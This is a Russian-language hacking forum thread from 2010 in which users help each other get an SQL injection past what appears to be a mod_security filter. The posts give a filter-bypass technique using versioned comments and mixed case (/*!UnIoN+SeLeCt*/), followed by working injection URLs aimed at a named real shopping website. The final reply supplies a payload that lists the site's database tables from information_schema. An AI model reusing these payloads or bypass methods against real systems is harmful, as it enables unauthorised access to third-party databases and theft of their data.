11.08.2010, 01:38
|
|
Познающий
Регистрация: 19.08.2009
Сообщений: 68
С нами:
8804080
Репутация:
446
|
|
Фильтруется этот параметр? Чем можно заменить?
Код:
group_concat(table_name+separator+0x7c)+from+information_schema.tables+where+table_schema=
|
|
|
11.08.2010, 01:52
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Electr0n
Фильтруется этот параметр? Чем можно заменить?
Код:
group_concat(table_name+separator+0x7c)+from+information_schema.tables+where+table_schema=
скажи что именно фильтруется
|
|
|
|
11.08.2010, 02:11
|
|
Познающий
Регистрация: 19.08.2009
Сообщений: 68
С нами:
8804080
Репутация:
446
|
|
Konqi, что именно не могу понять, как проверить?
|
|
|
|
11.08.2010, 02:12
|
|
Постоянный
Регистрация: 22.05.2009
Сообщений: 514
С нами:
8932646
Репутация:
133
|
|
А что именно то у тебя фильтруется???мб доступа нету к схеме?
|
|
|
|
11.08.2010, 02:16
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Electr0n
Konqi
, что именно не могу понять, как проверить?
Потести разные словa,
union, select, group_concat, table_name, и т.п.
ошибка - не фильтрирует
forbidden - фильтрирует
если конечно это mod_security
|
|
|
|
11.08.2010, 02:26
|
|
Познающий
Регистрация: 19.08.2009
Сообщений: 68
С нами:
8804080
Репутация:
446
|
|
Konqi, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...
Как остальные запросы фильтровать?
|
|
|
|
11.08.2010, 02:33
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от Electr0n
Konqi
, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...
Как остальные запросы фильтровать?
/showpost.php?p=2289579&postcount=14624
|
|
|
|
11.08.2010, 02:34
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Electr0n
Konqi
, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...
Как остальные запросы фильтровать?
обход тем же способом что и union select
/threadnav46016-1343-10.html
|
|
|
|
11.08.2010, 02:51
|
|
Познающий
Регистрация: 19.08.2009
Сообщений: 68
С нами:
8804080
Репутация:
446
|
|
Посмотрите пожалуйста фильтр, попробовал не получилось вывести таблицы...
Код:
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7--
|
|
|
|
11.08.2010, 02:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Electr0n
Посмотрите пожалуйста фильтр, попробовал не получилось вывести таблицы...
Код:
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7--
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,table_name,3,4,5,6,7+from+information_schema.%6 0tables%60--
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
